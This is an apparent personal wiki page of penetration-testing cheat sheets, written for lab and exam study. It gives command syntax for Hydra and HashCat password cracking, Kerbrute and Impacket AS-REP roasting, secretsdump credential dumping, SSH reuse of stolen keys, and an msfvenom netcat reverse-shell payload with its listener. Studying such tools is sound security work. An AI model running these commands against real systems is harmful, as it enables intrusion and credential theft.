The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » cheat_sheets_various
cheat_sheets_various

This is an old revision of the document!

Table of Contents

Various Tools & Their Syntax

Apache

Start a simple web server in Kali: 

service apache2 start
# default landing dir: /var/www/html

# To stop/kill the serveer: 
service apache2 stop

# To check Apache status: 
service apache2 status

Place files you want to transfer to the target machine in the /var/www/html/ directory. Then from the target machine, access via html (browser, etc.) and download the files.

certutil

In Windows, use certutil from the CLI to download files (like wget in Linux): 

certutil -urlcache -f http://[target ip]/filename.exe filename.exe

With the -f option, -urlcache forces fetching a specific URL and updating the cache.

Resource: documentation

curl

Download the home/index page from a site: 

curl http://[target ip]

Upload a file using PUT: 

curl http://[target ip/[subdir] --upload-file gk_put.txt           # or:
curl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"

Note: -X PUT is redundant when using -T (which is short for –upload-file)

dig

The DNS (Domain Name System) maps IP addresses to domain names.

When you plug a domain name in your browser URI box…

  1. Local cache is checked first for a valid mapping to an IP. TTL (measured in seconds) defines the length of time a mapping in cache is considered valid. If not found…
  2. Your router sends the request to a recursive DNS server (usually your ISP or OpenDNS, etc.). If not found…
  3. The recursive server passes the request to a root name server. Root name servers (13 unique IP addresses for them) keep track of the DNS servers in the next level down: top-level domain servers.
  4. Top-Level Domain (TLD) Servers are split up by extensions (.com, .org, .co.uk, etc.). TLD servers keep track of DNS servers one level down: authoritative name servers.
  5. Authoritative name servers are used to store DNS records for domains directly (the buck stops here). The IP mapped to the domain name you requested is sent back to you and your browser uses it to access the website you want to go to.

This whole process is automagic with browsers but dig can do all this manually (and show us the results).

Syntax: 

dig [domain] @[dns-server-ip]

# Example:
dig google.com @1.1.1.1

GoBuster

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

You need a wordlist. In Kali: /usr/share/wordlists

Run GoBuster with a wordlist: 

gobuster dir -u http://[ip]:[port] -w [/path/to/wordlist/file]

Flags:

Flag Description
-e Print the full URLs in your console
-u The target URL
-w Path to your wordlist
-U and -P Username and Password for Basic Auth
-p <x> Proxy to use for requests
-c <http cookies> Specify a cookie for simulating your auth

grep

grep for a “string” in all the files from root (/) or whatever directory you want 

grep -rnw / -e "admin@syntex.com" 2>/dev/null
grep -rnw /usr/share/ -e "admin@syntex.com" 2>/dev/null

Options:

  • -r : recursive; read all files under each directory, recursively
  • -n : number; Prefix each line of output with the 1-based line number within its input file.
  • -w : whole words; select only those lines containing matches that form whole words
  • -e [pattern] : expression; search for all patterns given; can be used to protect a pattern beginning with “-”

2>/dev/null sends STDERR to the abyss instead of to the screen.

HashCat

A password recovery tool…

Example Syntax:

  • Three of the most important options are:
  • -m Mode: the hash type, from the table in the help file
  • -a Attack-Mode: from a smaller table in the help file
  • -o Output file (so you don't have to do a –show later)
hashcat -m 18200 -a 0 -o cracked.txt hash.txt passwordlist.txt
# -m  mode for Kerberos 5, etype 23, AS-REP
# -a  straight (i.e., dictionary) attack mode; default attack mode
# -o  output file name cracked.txt

If you forget to put in the -o for an output file, you'll need to use the same command you used to crack the password and add –show to it.

HashCat Wiki for help: here.

Hydra

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more.

Syntax: To find the password for an ftp account when you know the username… 

hydra -t 4 -l [user] -P [/path/to/dictionary] -vV [machine IP] [ftp | ssh | etc]
#
# -t 4                     Number of parallel connections per target
# -l [user]                The login/username of the account we are trying to compromise
# -P [/path/to/dictionary] The file containing the list of possible passwords
#                          Example: /usr/share/wordlists/rockyou.txt
# -vV                      Very verbose: login+pass combo for each attempt
# [machine IP]             The IP address of the target machine
# [ftp | ssh | etc]        Sets the protocol

Kerberos

Kerberos is the default authentication service for Microsoft Windows domains. It is intended to be more secure than NTLM by using third party ticket authorization and stronger encryption.

Attack Privilege Requirements:

Kerbrute Enumeration No domain access required
Pass the Ticket Access as a user to the domain required
Kerberoasting Access as any user required
AS-REP Roasting Access as any user required
Golden Ticket Full domain compromise (domain admin) required
Silver Ticket Service hash required
Skeleton Key Full domain compromise (domain admin) required

Kerbrute

Kerbrute is a tool to quickly brute-force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

  • Download the binary for your machine.
  • chmod 777 [binary name] to make it executable.

Commands: 

# to get the general help screen:
./kerbrute

# to get the help screen for a specific command: 
./kerbrute [command name] -h

# specific help example:
./kerbrute userenum -h

# to enumerate AD usernames:
./kerbrute userenum --dc [target IP] -d [domain] userlist.txt 

# enumerate AD usernames example: 
./kerbrute userenum --dc 10.10.215.44 -d THM-AD userlist.txt | tee output.txt

# Brute force user accounts from a domain controller using a supplied wordlist:
./kerbrute userenum --dc [IP Address] -d CONTROLLER.local user_wordlist.txt

Here are some usage examples.

IMPacket

Found in Kali here: /usr/share/doc/python3-impacket/examples

GetNPUsers.py

Impacket’s GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user’s password, which can then be cracked offline. 

# mine from TryHackMe Attacktive Directory, #1
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request -outputfile GetNPUsers_output.txt -format hashcat -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# mine from TryHackMe Attacktive Directory, #2
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -no-pass -usersfile usersfile2.txt -dc-ip 10.10.215.44 spookysec.local/

# from wadcoms (above)
python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt

secretsdump.py

Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques. [ Source. ]

Command: 

python3 secretsdump.py test.local/john:password123@10.10.10.1

Some how-to stuff on interpreting the output: here.

Example: 

#            |-- colon separated values               
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# |-- username |                     |                          |
#              |-- RID (Relative ID) |                          |
#                                    |-- LM (LAN Manager) Hash  |
#                                        Old & Deprecated       |
#                                                               |-- NTLM Hash (for
#                                                                   Pass-the-Hash)

msfvenom

Reverse Shell Payload

To generate a reverse shell payload: 

msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R
# 
# -p    = payload
# lhost = our local host IP address (this is your machine's IP address)
# lport = the port to listen on (this is the port on your machine)
# R     = export the payload in raw format

After that set up a listener on your attach machine: 

nc -nvvlp [listening port]

Then copy and paste the msfvenom payload into the target box and run it. You should get a reverse shell on your attack machine.

Notes

To-Do: https://www.reddit.com/r/oscp/comments/ixmqp0/msfvenom/

Source: https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/

Advice: I intend to use some features of Metasploit for as many machines as I want on the exam. You really owe it to yourself to read the oscp-exam-guide regarding msfvenom.

Additional:

ping

Ping Multiple IPs – One-Liners…

Windows: 

FOR /L %i IN (1,1,254) DO ping -n 1 192.168.0.%i | FIND /i "Reply"

How it works:

  • FOR /L %i IN (1, 1, 254) : Create a loop from 1 to 254, the range of valid IPs a 192.168.0.0/24 network.
  • DO ping -n 1 192.168.1.%i : Follow the FOR loop by the ping command to execute on each iteration.
  • | FIND /i “Reply” : filter to display only replies (kinda hinky, might need to tweak this a bit)

Redirect output to a file with: > filename.txt

Linux: 

for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; done

How it works:

  • for ip in $(seq 1 254); : create a loop from one to 254.
  • do ping -c 1 192.168.1.$ip; done : ping the IP address, substituting the loop variable for the last part of the address, and then end the statement.

Redirect output to a file with: > filename.txt

Source: https://smallbusiness.chron.com/ping-ip-addresses-lan-68381.html

SSH

Syntax

ssh [user_name]@[host]  # host can be either IP or domain name
# OR
ssh -i [key-file] [user_name]@[host]

The default Key Name is id_rsa.

  • The private key: ~/.ssh/id_rsa
  • The public key: ~/.ssh/id_rsa.pub

Note: You need to chmod 600 id_rsa in order for the file to be usable in a session.

If you can obtain the id_rsa file of a target, just put it in your ~/.ssh directory and ssh into the target machine. Or reference the key file with the -i switch if you put it in another directory somewhere.

Copy via SSH

Syntax: 

scp [source] [destination]

Examples:

To copy a file from B to A while logged into B: 

scp /path/to/file username@a:/path/to/destination
#   [source]      [destination]

To copy a file from B to A while logged into A: 

scp username@b:/path/to/file /path/to/destination
#   [source]                 [destination]

tcpdump

Listener: To listen to an interface on my local machine and see if a ping from inside a target machine is getting out (i.e., do we have the ability to execute system commands?)… 

tcpdump ip proto \\icmp -i [interface name: eth0, tun0, etc.]
cheat_sheets_various.1707013101.txt.gz · Last modified: by gman